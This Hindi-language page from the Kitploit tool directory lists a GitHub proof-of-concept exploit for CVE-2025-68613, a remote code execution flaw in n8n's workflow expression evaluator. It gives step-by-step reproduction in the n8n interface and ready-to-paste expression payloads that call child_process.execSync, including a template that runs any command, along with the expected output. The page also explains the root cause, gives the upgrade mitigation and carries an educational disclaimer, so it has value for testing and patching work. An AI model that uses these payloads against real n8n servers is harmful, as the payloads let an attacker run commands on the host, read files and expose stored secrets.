Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
n8n-CVE-2025-68613-exploit — CVE-2025-68613: n8n RCE भेद्यता शोषण और दस्तावेज़ीकरण | Kitploit
उपकरण/GitHubGitHub/wioui/n8n-cve-2025-68613-exploit
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubwioui/n8n-cve-2025-68613-exploit

n8n-CVE-2025-68613-exploit

CVE-2025-68613: n8n RCE भेद्यता शोषण और दस्तावेज़ीकरण

रिपॉजिटरी देखें
1062228 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

n8n - CVE-2025-68613: गतिशील रूप से प्रबंधित कोड संसाधनों का अनुचित नियंत्रण

भेद्यता

n8n में इसके वर्कफ़्लो एक्सप्रेशन मूल्यांकन तंत्र में एक गंभीर मनमाना कोड निष्पादन भेद्यता मौजूद है। कुछ शर्तों के तहत, वर्कफ़्लो कॉन्फ़िगरेशन के दौरान प्रमाणित उपयोगकर्ताओं द्वारा प्रदान किए गए एक्सप्रेशन का मूल्यांकन ऐसे निष्पादन संदर्भ में किया जा सकता है जो अंतर्निहित रनटाइम से पर्याप्त रूप से अलग नहीं है।

प्रभावित संस्करण

  • असुरक्षित: n8n < v1.122.0
  • पैच किया गया: n8n >= v1.122.0

आवश्यकताएँ

  • n8n इंस्टेंस तक प्रमाणित पहुंच
  • वर्कफ़्लो बनाने/संपादित करने की क्षमता

पुनरुत्पादन के चरण

1. नया वर्कफ़्लो बनाएं

  • "Add workflow" पर क्लिक करें

2. नोड जोड़ें

  • "Manual Trigger" नोड जोड़ें
  • "Set" नोड जोड़ें (ट्रिगर से जुड़ा हुआ)

3. पेलोड कॉन्फ़िगर करें

  • Set नोड पर क्लिक करें
  • "Add Value" पर क्लिक करें → "String" चुनें
  • फ़ील्ड का नाम "result" रखें
  • एक्सप्रेशन मोड सक्षम करने के लिए "=" आइकन पर क्लिक करें

4. पेलोड इंजेक्ट करें

इस पेलोड को एक्सप्रेशन फ़ील्ड में पेस्ट करें:

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

5. निष्पादित करें

  • "Execute step" पर क्लिक करें
  • कमांड परिणाम के लिए Set नोड आउटपुट जांचें

CVE-2025-68613 शोषण प्रदर्शन

पेलोड उदाहरण

ID कमांड:

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

PWD कमांड:

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('pwd').toString() })() }}

कस्टम कमांड टेम्पलेट:

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('COMMAND').toString() })() }}

अपेक्षित आउटपुट

id कमांड के लिए:

root@kitploit:~
uid=1000(node) gid=1000(node) groups=1000(node)

pwd कमांड के लिए:

root@kitploit:~
/app

मूल कारण

एक्सप्रेशन मूल्यांकनकर्ता में फ़ंक्शन एक्सप्रेशन को this.process (Node.js प्रोसेस ऑब्जेक्ट) तक पहुंचने से रोकने के लिए एक सैनिटाइज़र का अभाव है, जिससे सिस्टम मॉड्यूल तक पहुंच संभव हो जाती है।

प्रभाव

  • मनमाना कमांड निष्पादन
  • फ़ाइल सिस्टम एक्सेस
  • पर्यावरण चर उजागर होना
  • पूर्ण सिस्टम समझौता

शमन

n8n v1.122.0 या बाद के संस्करण में अपग्रेड करें।

संदर्भ

  • फिक्स: https://github.com/n8n-io/n8n/commit/08f332015153decdda3c37ad4fcb9f7ba13a7c79
  • रेपो: https://github.com/n8n-io/n8n
  • ब्लॉग पोस्ट : https://blog.ogwilliam.com/post/n8n-rce-vulnerability-cve-2025-68613

अस्वीकरण: यह जानकारी केवल सैंडबॉक्स और शैक्षिक उद्देश्यों के लिए प्रदान की गई है। सिस्टम का शोषण करने के लिए इस जानकारी का अनधिकृत उपयोग अवैध और अनैतिक है। भेद्यता का परीक्षण या शोषण करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें।

टूल डाउनलोड करें